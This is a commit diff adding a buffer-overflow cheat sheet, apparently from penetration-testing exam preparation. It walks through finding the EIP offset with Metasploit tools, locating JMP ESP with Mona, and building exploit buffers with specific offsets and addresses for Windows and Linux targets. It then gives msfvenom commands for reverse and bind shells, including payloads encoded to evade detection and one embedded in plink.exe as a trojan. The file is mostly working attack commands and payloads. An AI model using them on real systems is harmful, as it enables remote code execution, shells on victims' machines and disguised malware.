Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
67 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,3 +1,70 @@ | ||
| ---------------- Buffer Overflow ---------------- | ||
| /usr/share/metasploit-framework/tools/pattern_create.rb <[LENGTH]> | ||
| /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -<[ADDRESS]> | ||
|
|
||
| DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) | ||
|
|
||
| MSFvenom | ||
| https://www.offensive-security.com/metasploit-unleashed/msfvenom/ | ||
|
|
||
| ---------------- Windows Buffer Overflows ---------------- | ||
| Controlling EIP | ||
| locate pattern_create | ||
| # pattern_create.rb -l 2700 | ||
| locate pattern_offset | ||
| # pattern_offset.rb -q 39694438 | ||
| Verify exact location of EIP - [*] Exact match at offset 2606 | ||
| # buffer = "A" * 2606 + "B" * 4 + "C" * 90 | ||
|
|
||
| Check for “Bad Characters” - Run multiple times 0x00 - 0xFF | ||
| Use Mona to determine a module that is unprotected | ||
| Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP | ||
| Otherwise without DEP, we can stick our | ||
| Use NASM to determine the HEX code for a JMP ESP instruction | ||
| # /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb JMP ESP 00000000 FFE4 jmp esp | ||
|
|
||
| Run Mona in immunity log window to find (FFE4) XEF command | ||
| # !mona find -s "\xff\xe4" -m slmfc.dll found at 0x5f4a358f - Flip around for little endian format | ||
|
|
||
| # buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390 | ||
|
|
||
| MSFVenom to create payload | ||
| # msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d" | ||
|
|
||
| Final Payload with NOP slide | ||
| # buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode | ||
|
|
||
| Create a PE Reverse Shell | ||
| # msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe | ||
|
|
||
|
|
||
| Create a PE Reverse Shell and Encode 9 times with Shikata_ga_nai | ||
| # msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe | ||
|
|
||
| Create a PE reverse shell and embed it into an existing executable | ||
| # msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe | ||
|
|
||
| Create a PE Reverse HTTPS shell | ||
| # msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe | ||
|
|
||
| ---------------- Linux Buffer Overflows ---------------- | ||
| Run Evans Debugger against an app | ||
| # edb --run /usr/games/crossfire/bin/crossfire | ||
|
|
||
| ESP register points toward the end of our CBuffer | ||
| add eax,12 | ||
| jmp eax | ||
| 83C00C add eax,byte +0xc | ||
| FFE0 jmp eax | ||
|
|
||
| Check for “Bad Characters” Process of elimination - Run multiple times 0x00 - 0xFF | ||
|
|
||
| Find JMP ESP address | ||
| "\x97\x45\x13\x08" # Found at Address 08134597 | ||
|
|
||
| crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90" | ||
|
|
||
| msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" –e x86/shikata_ga_nai | ||
|
|
||
| Connect to the shell with netcat: | ||
| # nc -v $ip 4444 |